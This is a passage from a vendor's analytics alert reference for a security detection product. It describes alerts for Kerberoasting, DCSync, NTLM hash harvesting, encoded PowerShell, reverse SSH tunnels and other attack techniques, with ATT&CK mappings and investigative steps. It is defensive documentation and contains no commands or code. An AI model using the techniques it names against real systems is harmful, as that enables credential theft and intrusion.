alert. Services associated with user accounts are a common target for Kerberoasting due to default weak
encryption.

Attacker's Goals
Crack account credentials by obtaining easy-to-crack Kerberos tickets.

Investigative Actions
Check who used the host at the time of the alert, to rule out a benign service or tool accessing those
services.

68 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Multiple discovery commands
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 10 Minutes

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique • Remote System Discovery (T1018)


• System Information Discovery (T1082)
• System Network Configuration Discovery (T1016)
• System Service Discovery (T1007)

Severity Low

Description
The alerted process performed multiple consecutive discovery commands in a short time frame.

Attacker's Goals
Collect information about the host, network and user configuration for lateral movement and privilege
escalation.

Investigative Actions
• Verify if the script or process initiating the discovery commands is benign.
• Verify that this isn't sanctioned IT activity.
• Look for other hosts executing similar commands.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 69
© 2021 Palo Alto Networks, Inc.
NTLM Brute Force on a Service Account
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 10 Minutes

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• Palo Alto Networks Firewall Logs, XDR Agent, AzureAD, Okta, or
PingOne
• Palo Alto Networks Firewall Logs, XDR Agent, Corelight, or Third-
Party Firewalls

Required Detection Modules Identity Analytics

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique Brute Force (T1110)

Severity Low

Description
A service account attempted to authenticate to a target using NTLM an excessive number of times in a
short period. * This may indicate a NTLM brute-force attack.

Attacker's Goals
The attacker attempts to gain access to the service accounts.

Investigative Actions
Verify any successful authentication by the user account referenced by the alert, as these can indicate the
attacker managed to guess the credentials.

70 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
NTLM Hash Harvesting
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• Palo Alto Networks Firewall Logs, XDR Agent, AzureAD, Okta, or
PingOne
• Palo Alto Networks Firewall Logs, XDR Agent, Corelight, or Third-
Party Firewalls

Required Detection Modules Identity Analytics

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique OS Credential Dumping (T1003)

Severity Medium

Description
An unusual number of users has sent NTLM to {auth_target} in the last hour. This may be indicative of
poisoning and NTLM hash harvesting.

Attacker's Goals
The attacker may attempt to extract NTLM hashes for credential access.

Investigative Actions
• Check that the destination is not a server.
• Verify that the destination is not external to the organization.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 71
© 2021 Palo Alto Networks, Inc.
Network sniffing via command-line tool
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Credential Access (TA0006)


• Discovery (TA0007)

ATT&CK Technique Network Sniffing (T1040)

Severity Medium

Description
Attackers may monitor network traffic for cleartext credentials or to learn the network's configuration.

Attacker's Goals
Gain user-account credentials.

Investigative Actions
Check whether the executing process is benign, and if this was a desired behavior as part of its normal
execution flow.

72 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
New Administrative Behavior
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 12 Hours

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs, XDR Agent, Corelight, or
Third-Party Firewalls

Required Detection Modules No module required

ATT&CK Tactic Lateral Movement (TA0008)

ATT&CK Technique Remote Services (T1021)

Severity Low

Description
The endpoint performed new administrative actions, relative to its previously profiled behavior. It is possible
that an endpoint will infrequently be used for administrative activities, so analytics is performed using logs
collected over a long period of time, also comparing the activity to that of other endpoints. That is, if many
endpoints are contacting the same destination with the same administrative activity, then this network
activity is less likely to result in this alert.
An attacker may be operating on the host, probing other computers and moving laterally inside the network
using a trusted computer and credentials. Attackers typically exhibit administrative behaviors when
performing reconnaissance and lateral movement.

Attacker's Goals
An attacker is using administrative functions to move from one endpoint to another, or to scan the network
for new endpoints to attack.

Investigative Actions
Investigate the endpoint to determine if it is legitimately being used for administrative functions.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 73
© 2021 Palo Alto Networks, Inc.
Port Scan
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 1 Hour

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs, XDR Agent, Corelight, or
Third-Party Firewalls

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique Network Service Scanning (T1046)

Severity Medium

Description
The endpoint connected, or attempted to connect, to multiple privileged ports (lower than port 1024),
which are infrequently used by other endpoints (i.e. destination ports that are normally used by many
endpoints will not raise this alert).
Attackers perform port scans for reconnaissance purposes, to find computers or servers that accept
connections in these ports, and to find vulnerable services that can be exploited.

Attacker's Goals
An attacker is determining which ports are open or closed on remote endpoints in an attempt to identify the
endpoint operating system, firewall configuration, and exploitable services.

Investigative Actions
• New endpoints that use multiple ports can cause a false positive. Ensure that the endpoint is not new
on the network, and is not hosting services such as FTP servers or domain controllers that are being
contacted for the first time.
• Check if the activity is a SYN-ACK scan. These might result in Cortex XDR Analytics detecting the scan
as coming from the wrong direction, and could mean that Cortex XDR Analytics used the wrong baseline
in triggering the alert.
• Check for port map and/or X11 usage. These usually open multiple ports. If the protocol usage for the
specific destination is sparse, Cortex XDR Analytics could raise a false alert.

74 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Possible DCShadow attempt
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs, XDR Agent, Corelight, or
Third-Party Firewalls

Required Detection Modules No module required

ATT&CK Tactic • Credential Access (TA0006)


• Defense Evasion (TA0005)

ATT&CK Technique • OS Credential Dumping (T1003)


• Rogue Domain Controller (T1207)

Severity High

Description
Attackers may register a compromised host as a new DC to get other DCs to replicate data to it, and then
push their malicious AD changes to all DCs.

Attacker's Goals
Retrieve Active Directory data, to later be able to push out malicious Active Directory changes.

Investigative Actions
Check whether the destination is a new domain controller or a host that syncs with ADFS or Azure AD.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 75
© 2021 Palo Alto Networks, Inc.
Possible DCSync Attempt
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs, XDR Agent, Corelight, or
Third-Party Firewalls

Required Detection Modules No module required

ATT&CK Tactic • Credential Access (TA0006)


• Defense Evasion (TA0005)

ATT&CK Technique • OS Credential Dumping (T1003)


• Rogue Domain Controller (T1207)

Severity Medium

Description
Attackers may pose a compromised host as a DC to replicate data to it (DCSync).

Attacker's Goals
An attacker is trying to retrieve Active Directory data.

Investigative Actions
Check whether one of the machines is a new domain controller.

76 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Possible Kerberoasting without SPNs
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique Steal or Forge Kerberos Tickets: Kerberoasting (T1558.003)

Severity Low

Description
A user specifically requested weak and deprecated encryption in a Kerberos TGS request. This provides
easy-to-crack hashes, and is typically a sign of a Kerberoasting attack. The requested service was specified
by using a suspicious SPN type, which is often used by Kerberoasting tools to request by SAN instead of
SPN.

Attacker's Goals
Crack service account credentials by obtaining an easy-to-crack Kerberos ticket.

Investigative Actions
Check who used the host at the time of the alert, to rule out a benign service or tool requesting weak
Kerberos encryption.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 77
© 2021 Palo Alto Networks, Inc.
Possible Search For Password Files
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique Unsecured Credentials: Credentials In Files (T1552.001)

Severity Medium

Description
Attackers often search for files that have passwords in them.

Attacker's Goals
Gain user-account credentials.

Investigative Actions
Check whether the executing process is benign, and if this was a desired behavior as part of its normal
execution flow.

78 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Possible compromised machine account
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique User Execution (T1204)

Severity Medium

Description
A Kerberos TGT for machine account has been used that does not match hostname

Attacker's Goals
Gain special user Kerberos ticket to move laterally.

Investigative Actions
• Check the source host for possible credential dumping.
• Check the delegated account credentials and if it has high privileges.
• Check the ticket destination to verify whether it is a sensitive asset.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 79
© 2021 Palo Alto Networks, Inc.
PowerShell Initiates a Network Connection to
GitHub
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent


For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique Command and Scripting Interpreter: PowerShell (T1059.001)

Severity Low

Description
PowerShell initiates a Network Connection to GitHub with an uncommon command line. This may have
legitimate uses, but this technique is frequently used by attackers to serve malicious payloads.

Attacker's Goals
Download a second stage payload for execution.

Investigative Actions
• Check if the initiator process is malicious.
• Check for additional file/network operations by the same PowerShell instance.

80 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
PowerShell runs suspicious base64-encoded
commands
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 6 Hours

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique Command and Scripting Interpreter: PowerShell (T1059.001)

Severity Medium

Description
Running PowerShell with a base64-encoded payload in the command line is often used by attackers to
evade detection.

Attacker's Goals
Run general code to perform actions or download other malicious programs.

Investigative Actions
• Check if the initiator process is malicious.
• Check for other operations by the PowerShell instance.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 81
© 2021 Palo Alto Networks, Inc.
RDP Connection to localhost
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent


For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Lateral Movement (TA0008)

ATT&CK Technique Remote Services: Remote Desktop Protocol (T1021.001)

Severity Medium

Description
RDP connection to localhost can be used for privilege escalation by leveraging Windows Accessibility
Features.

Attacker's Goals
An attacker may initiate RDP tunneling for a more convenient and stable interface.

Investigative Actions
• Identify the process/user performing RDP and check that it is authorized.
• Check whether the initiating process also connects to an external host.

82 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Random-Looking Domain Names
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Day

Deduplication Period 1 Day

Required Data Palo Alto Networks Firewall Logs


For increased accuracy, you can also add the following optional data
source: XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Dynamic Resolution: Domain Generation Algorithms (T1568.002)

Severity Medium

Description
The endpoint performed DNS lookups to an excessively large number of apparently random root domain
names. This alert might be symptomatic of malware that is trying to connect to its command and control
(C2) servers.
The attacker's C2 server runs on one or more domains that can eventually be identified and blacklisted. To
avoid this, malware will sometimes use Domain Generation Algorithms (DGA) that produce many unique,
random-looking domain names every day. Because only a few of these domains are ever registered, the
installed malware must blindly try to access each generated domain name in an effort to locate an active
one, which may also trigger the Failed DNS alert.

Attacker's Goals
Communicate with malware running on your network to control its activities, performing software updates,
or to take inventory of infected machines.

Investigative Actions
• Make sure your DNS servers are not misconfigured and are responsive. This detector assumes that most
DNS lookups succeed, and will only raise an alert when it sees many failed lookups. Misconfigured or
unresponsive DNS servers can result in a false positive.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 83
© 2021 Palo Alto Networks, Inc.
• Make sure you do not have external domains configured as internal domains. This can result in clients
attempting to (for example) resolve google.com.local first, before resolving google.com. This can result in
a false positive for this alert.
• Ensure that the endpoint is configured properly for your DNS servers. Make sure it is configured to use
the correct DNS IP address, and that the IP address is not for a firewalled DNS server. Misconfigured
DNS clients can result in many failed lookups, which will result in a false positive for this alert.
• Make sure the endpoint is not a DNS, Proxy, NAT or VPN gateway server. If these have been
misdetected by Cortex XDR Analytics, then their ordinary operations can trigger this alert.

84 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Rare SSH Session
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent


For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Lateral Movement (TA0008)

ATT&CK Technique Remote Services (T1021)

Severity Low

Description
Secure Shell (SSH) provides a secure means of remote administration. Attackers can use valid SSH
credentials and keys to remotely connect to endpoints running the SSH service.

Attacker's Goals
Secure Shell (SSH) provides a secure means of remote administration. Attackers can use valid SSH
credentials and keys to remotely connect to endpoints running the SSH service.

Investigative Actions
• Verify that the process is allowed in the organization.
• Check if the user should access the destination and whether the session was successful or not.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 85
© 2021 Palo Alto Networks, Inc.
Rare Unsigned Process Spawned by Office
Process Under Suspicious Directory
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique User Execution (T1204)

Severity Low

Description
Microsoft Office executed an unsigned process in a suspicious directory. This behavior is common with
malicious macros.

Attacker's Goals
Attackers execute commands after infiltrating by using phishing or exploiting a vulnerability in an office.

Investigative Actions
• Investigate the executed process.
• Investigate the document/email that initiated it.

86 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Rare WinRM Session
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent


For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Lateral Movement (TA0008)

ATT&CK Technique Remote Services: Windows Remote Management (T1021.006)

Severity Informational

Description
Windows Remote Management (WinRM) enables users to interact with remote systems in different ways,
including running executables on the remote system. WinRM sessions can be established using WinRM/
WinRS commands or programs such as PowerShell. Attackers can use WinRM to execute code and move
laterally within a compromised network.

Attacker's Goals
Windows Remote Management (WinRM) enables users to interact with remote systems in different ways,
including running executables on the remote endpoint. WinRM sessions can be established using winrm/
winrs commands or programs such as PowerShell. Attackers can use WinRM to execute code and move
laterally within a compromised network.

Investigative Actions
Investigate the endpoints participating in the session.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 87
© 2021 Palo Alto Networks, Inc.
Rare process execution by user
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 30 Days

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique User Execution (T1204)

Severity Informational

Description
An unusual process was executed by a user. This may be indicative of a compromised account.

Attacker's Goals
Unusual processes may be executed for various purposes including exfiltration, lateral movement, etc.

Investigative Actions
Investigate the process that was executed to determine if it was used for legitimate purposes or malicious
activity.

88 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Rare process execution in organization
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 30 Days

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique User Execution (T1204)

Severity Informational

Description
An unusual process was executed in the organization. This may be indicative of a compromised account.

Attacker's Goals
Unusual processes may be executed for various purposes including exfiltration, lateral movement, etc.

Investigative Actions
Investigate the process that was executed to determine if it was used for legitimate purposes or malicious
activity.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 89
© 2021 Palo Alto Networks, Inc.
Recurring access to rare IP
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 21 Days

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• Palo Alto Networks Firewall Logs
• XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Non-Application Layer Protocol (T1095)

Severity Low

Description
The endpoint is periodically accessing an external fixed-IP address that its peers rarely use. Access to this
external IP address has occurred repeatedly over many days. This connection pattern is consistent with
malware connecting to its command and control server for updates and operating instructions.

Attacker's Goals
Communicate with malicious code running on your network enabling further access to the endpoint and
network, performing software updates on the endpoint, or for taking inventory of infected machines.

Investigative Actions
• Identify if the IP address belongs to a reputable organization or an asset used in a public cloud.
• Identify if the source of the traffic is malware. If the source of the traffic is a malicious file, Cortex XDR
Analytics also raises a malware alert for the file on the endpoint. Malware may contact legitimate IP
addresses, therefore check for unusual apps used, or unusual ports or volumes accessed.
• View all related traffic generated by the suspicious process to understand the purpose.
• Look for other endpoints on your network that are also contacting the suspicious IP address.
• Examine file-system operations performed by the process to look for potential artifacts on infected
endpoints.

90 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Recurring access to rare domain categorized as
malicious
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Palo Alto Networks Firewall Logs


For increased accuracy, you can also add the following optional data
source: XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Application Layer Protocol (T1071)

Severity Medium

Description
The endpoint is periodically connecting to an external domain (categorized as malicious) that it and its
peers rarely use. Access to this domain has occurred repeatedly over multiple days. This connection pattern
is consistent with malware connecting to its command and control server for updates and operating
instructions.

Attacker's Goals
Communicate with malware running on your network to control malware activities, perform software
updates on the malware, or to take inventory of infected machines.

Investigative Actions
• Identify the process/user contacting the remote domain and determine whether the traffic is malicious.
• Look for other endpoints on your network that are also periodically contacting the suspicious domain.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 91
© 2021 Palo Alto Networks, Inc.
Recurring rare domain access from an unsigned
process
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 14 Days

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• Palo Alto Networks Firewall Logs
• XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Application Layer Protocol (T1071)

Severity Medium

Description
An unsigned process is periodically connecting to an external domain that it and its peers rarely use. Access
to this domain has occurred repeatedly over multiple days. This connection pattern is consistent with
malware connecting to its command and control server for updates and operating instructions.

Attacker's Goals
Communicate with malware running on your network to control malware activities, perform software
updates on the malware, or to take inventory of infected machines.

Investigative Actions
• Identify the process contacting the remote domain and determine whether the traffic is malicious.
• Look for other endpoints on your network that are also periodically contacting the suspicious domain.

92 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Recurring rare domain access to dynamic DNS
domain
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 14 Days

Required Data Palo Alto Networks Firewall Logs


For increased accuracy, you can also add the following optional data
source: XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Application Layer Protocol (T1071)

Severity Medium

Description
The endpoint is periodically connecting to an external domain that it and its peers rarely use. Access to this
domain has occurred repeatedly over multiple days. This connection pattern is consistent with malware
connecting to its command and control server for updates and operating instructions.

Attacker's Goals
Communicate with malware running on your network to control malware activities, perform software
updates on the malware, or to take inventory of infected machines.

Investigative Actions
• Identify the process/user contacting the remote domain and determine whether the traffic is malicious.
• Look for other endpoints on your network that are also periodically contacting the suspicious domain.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 93
© 2021 Palo Alto Networks, Inc.
Remote account enumeration
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic • Discovery (TA0007)


• Credential Access (TA0006)

ATT&CK Technique • Account Discovery (T1087)


• Brute Force (T1110)

Severity Medium

Description
Multiple non-existing accounts failed to remotely log in to a host in a short period of time. This may indicate
an attacker is trying to remotely enumerate accounts.

Attacker's Goals
Discover valid accounts to gain credentials.

Investigative Actions
Check if the login attempts were part of a legitimate misunderstanding of the system or part of an attack.

94 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Remote command execution via wmic.exe
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique Windows Management Instrumentation (T1047)

Severity Medium

Description
Remote command execution using the Windows Management Instrumentation command-line tool.

Attacker's Goals
The attacker is expanding his reach into your network by executing commands on a remote endpoint.

Investigative Actions
• Examine Alert Details > Overview to identify the source endpoint, process running the command
execution, process owner, and execution destination.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 95
© 2021 Palo Alto Networks, Inc.
Remote service command execution from an
uncommon source
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Lateral Movement (TA0008)


• Execution (TA0002)

ATT&CK Technique • Remote Services (T1021)


• System Services: Service Execution (T1569.002)

Severity High

Description
A remotely triggered service initiated a command execution by a host that rarely triggers services to other
remote hosts.

Attacker's Goals
Perform lateral movement to new hosts to expand the foothold within a network.

Investigative Actions
• Investigate the processes being spawned on the host for malicious activities.
• Correlate the RPC call from the source host and understand which software initiated it.

96 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Remote service start from an uncommon
source
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Lateral Movement (TA0008)


• Execution (TA0002)

ATT&CK Technique • Remote Services (T1021)


• System Services: Service Execution (T1569.002)

Severity Low

Description
A remotely triggered service initiated by a host that rarely triggers services to other remote hosts.

Attacker's Goals
Perform lateral movement to new hosts to expand the foothold within a network.

Investigative Actions
• Investigate the service being spawned on the host for malicious activities.
• Correlate the RPC call from the source host and understand which software initiated it.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 97
© 2021 Palo Alto Networks, Inc.
Reverse SSH tunnel to external domain/ip
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 12 Hours

Required Data XDR Agent


For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Protocol Tunneling (T1572)

Severity Medium

Description
Reverse SSH tunnel might have been created

Attacker's Goals
Attackers may use SSH to create an encrypted tunnel to allow an attacker to covertly connect to an internal
host.

Investigative Actions
• Review the external ip/domain.
• Investigate the causality of the process.

98 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
SMB Traffic from Non-Standard Process
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent


For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique Network Service Scanning (T1046)

Severity Medium

Description
SMB traffic is usually performed by a standard set of privileged processes through designated ports. The
endpoint had a non-standard process communicating over ports normally used by SMB. An attacker might
be moving laterally by using tools that implement a custom version of the SMB protocol.

Attacker's Goals
• This might be symptomatic of an attacker's lateral movements. The attacker could be:
• using a custom protocol implementation that offers malicious functionality
• using a protocol other than SMB or Kerberos, but that still uses the SMB or Kerberos well-known ports.
Either way, the attacker's goal is to gain access to another endpoint on your network. The attacker could
also be surveying your network by performing service scans over the well-known SMB or Kerberos
ports.

Investigative Actions
• Make sure the process is not a scanner that implements its version of the protocol, and that the scanner
use is for sanctioned purposes. For example, nmap enumerating SMB.
• Make sure the process is not a sanctioned security product that creates standalone binaries for its use.
For example, Illusive Network honeypots.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 99
© 2021 Palo Alto Networks, Inc.
• Investigate the process to see if the high-level language used to implement the application is the source
of the alert. Some high-level programming languages provide their protocol implementations. For
example, Java uses its Kerberos implementation.
• Examine the endpoint to see if it is infected with malware. If the parent-child chain of initiating
processes has been infiltrated with a malicious replacement, then that replacement could be known
malware.

100 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
SSO authentication by a machine account
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: AzureAD, Okta, or PingOne

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Low

Description
A machine account attempted to authenticate via SSO

Attacker's Goals
Use an account that has access to resources to move laterally in the network and access privileged
resources.

Investigative Actions
• See whether the service authentication was successful.
• Check whether the account has done any administrative actions it should not usually do.
• Look for more logins and authentications by the account throughout the network.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 101
© 2021 Palo Alto Networks, Inc.
SSO authentication by a service account
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: AzureAD, Okta, or PingOne

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Low

Description
A service account attempted to authenticate via SSO

Attacker's Goals
Use an account that has access to resources to move laterally in the network and access privileged
resources.

Investigative Actions
• See whether the service authentication was successful.
• Check whether the account has done any administrative actions it should not usually do.
• Look for more logins and authentications by the account throughout the network.

102 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
SSO with abnormal operating system
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: AzureAD or Okta
For increased accuracy, you can also add the following optional data
source: XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Low

Description
A user attempted to authenticate via SSO with an abnormal operating system

Attacker's Goals
Use a legitimate user and authenticate via an SSO service to gain access to the network.

Investigative Actions
• See whether the service authentication was successful.
• Confirm that the activity is benign (e.g. the user has really moved to a new operating system).
• Follow actions and suspicious activities regarding the user.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 103
© 2021 Palo Alto Networks, Inc.
SSO with new operating system
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: AzureAD or Okta

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Informational

Description
A user attempted to authenticate via SSO with a new operating system

Attacker's Goals
Use a legitimate user and authenticate via an SSO service to gain access to the network.

Investigative Actions
• See whether the service authentication was successful.
• Confirm that the activity is benign (e.g. the user has really moved to a new operating system).
• Follow actions and suspicious activities regarding the user.

